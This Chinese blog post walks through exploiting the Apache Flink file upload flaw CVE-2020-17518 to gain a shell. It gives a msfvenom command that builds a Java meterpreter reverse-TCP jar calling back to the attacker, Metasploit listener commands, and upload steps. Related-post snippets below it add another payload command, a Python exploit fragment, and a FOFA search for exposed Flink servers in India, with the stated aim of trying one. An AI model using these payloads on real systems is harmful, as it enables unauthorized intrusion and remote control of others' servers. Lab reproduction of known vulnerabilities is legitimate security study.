CVE-2020-17518漏洞------apache-flink文件上传漏洞复现并获取shell权限

于 2024-12-23 09:47:04 发布
阅读量473 收藏 4
点赞数 3
文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62283559/article/details/144615277
版权

漏洞描述

        Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,并通过精心构造的HTTP Header,实现远程文件写入。

        总结:可以上传恶意文件获取后台权限。

参考文章:

Apache Flink任意jar包上传漏洞(1.9.1最新版)_apache flink 1.9.0漏洞 反弹shell-优快云博客

Apache Flink 文件上传漏洞 (CVE-2020-17518) - FreeBuf网络安全行业门户

漏洞复现

1、查看漏洞信息

        主页访问http://targetIP:8081,可以查看到主页,我们未经授权就可以访问到该页面,说明该页面存在着安全隐患。

2、 生成jar包

        在kali中执行下面的语句,生成jar文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=攻击机ip LOBPORT=攻击机任意不被占用的端口 -f jar > 生成的jar包名.jar

3、msfconsole开启监听

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set PAYLOAD java/meterpreter/reverse_tcp 
msf6 exploit(multi/handler) > set lhost 攻击机ip 
msf6 exploit(multi/handler) > run

4、上传jar文件

       按照下面的步骤进行提交,然后点击submit

5、msf6查看是否连接成功,如下所示成功连接,获取shell权限,可以输入ls/ipconfig/whoami来查看信息。

6、最后,如果你不是在自己搭建的环境中进行渗透的话,建议复现完后将jar包进行删除。

         在网页上点击delete删除即可。

这个漏洞的复现我在1.11.1/1.17.1/1.14.4三个版本中都成功了。

[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_51577576的博客
09-05 2469
[ vulhub漏洞复现篇 ] Apache Flink 文件上传漏洞 (CVE-2020-17518) Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,通过精心构造的HTTP Header,实现远程文件写入。
Apache Flink -任意文件写入漏洞复现CVE-2020-17518
0xSec
01-11 1701
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
Apache Flink -任意文件写入漏洞CVE-2020-17518
chaojixiaojingang
01-07 4282
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
CVE-2020-17518漏洞复现
m0_48736242的博客
10-01 1625
记录第一次漏洞复现cve-2020-17518文件上传漏洞
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
SmileAssassn的博客
01-08 884
Apache Flink文件上传漏洞CVE-2020-17518漏洞复现分析
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1413
Apache Flink 文件上传漏洞 (CVE-2020-17518)
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Makboli的博客
07-02 612
CVE-2020-17518 Apache Flink 上传路径遍历漏洞复现
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 2139
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
Apache Flink CVE-2020-17519
weixin_45682070的博客
02-04 303
fofa搜索Apache Flink app="APACHE-Flink" &&country="IN" 未授权任意上传jar包导致远程代码执行,找一个阿三的站试试 1:上传生成好的jar包 msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar 上传jar包之后监听端口 use exploit/multi/handler set payload java/shell/reve
利用CVE-2020-17518一键Getshell
baidu_38844729的博客
01-13 676
漏洞描述 Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入到本地文件系统上的任意位置 漏洞利用 import requests import json import base64 #获取tmpdir的路径 url = "http://ip:port" tmpdir_url = url + '/jobmanager/config' tmpdir_res = requests.get(tmpdir_url) tmpdir = json.loads(
apache flink目录遍历漏洞CVE-2020-17518复现
ANYOUZHEN的博客
06-04 1405
漏洞描述:apache Flink目录遍历漏洞,可通过REST API读/写远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
Apache Flink CVE-2020-17519/17518 漏洞复现
蚁景网安学院
01-18 917
喜欢就关注我吧,订阅更多最新消息文章字数1507 预计阅读时长7分钟 涉及知识点实操练习-网络安全事件https://www.hetianlab.com/cour.do?w=1&am...
漏洞复现----13、Apache Flink 文件上传漏洞 (CVE-2020-17518)
七天
11-09 4020
文章目录一、Apache Flink简介二、漏洞简介三、漏洞复现四、上传jar包getshell 一、Apache Flink简介 Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,能以内存速度和任意规模进行计算。Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但
CVE-2020-17518 flink任意文件上传漏洞复现
qq_49279082的博客
02-08 4123
本人对CVE-2020-17518漏洞的理解
Apache Flink漏洞CVE-2020-17519)
小小猪的博客
12-30 1375
Apache Flink漏洞CVE-2020-17519) 漏洞简介: Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 影响版本: 1.11.0、1.11.1、1.11.2 环境搭建: 在线环境 地址 漏洞复现: 访问首页 构造poc (url二次编码) /jobmanager/logs/..%252f..%252f..%252f
漏洞复现----12、Apache Flink目录穿越漏洞CVE-2020-17519 )
七天
11-10 3001
文章目录一、漏洞简介二、漏洞复现 一、漏洞简介 Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。 影响版本: 1.11.0、1.11.1、1.11.2 二、漏洞复现 Payload: 192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
ierciyuan的博客
08-04 941
CVE-2020-17518&17519 Apache Flink 文件上传&Apache Flink jobmanagerlogs 目录穿越漏洞复现
Apache Tomcat CVE-2017-12615远程代码执行漏洞分析
weixin_30815469的博客
09-27 1128
2017年9月19日, Apache Tomcat官方发布两个严重的安全漏洞, 其中CVE-2017-12615为远程代码执行漏洞,通过put请求向服务器上传恶意jsp文件, 再通过jsp文件在服务器上执行任意代码, 且最新的补丁未完全修复漏洞漏洞编号 CVE-2017-12615 漏洞名称 Apache Tomcat 远程代码执行漏洞 漏洞评级 严重 影响范围 ...
Apache Flink 文件上传漏洞CVE-2020-17518
最新发布
weixin_53639243的博客
02-23 406
Apache Flink 是一个开源的流处理框架,具有强大的流处理和批处理能力。Apache Flink 1.5.1 引入了一个 REST 处理程序,允许您通过恶意修改的 HTTP HEADER 将上传的文件写入本地文件系统上的任意位置。
深入解析Apache Tomcat文件包含漏洞CVE-2020-1938)
本篇将详细解读关于Apache Tomcat服务器所面临的一个特定安全漏洞——CNVD-2020-10487(对应CVE-2020-1938)。 **Apache Tomcat介绍** Apache Tomcat是Apache软件基金会的Jakarta项目的一部分,主要用于运行Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值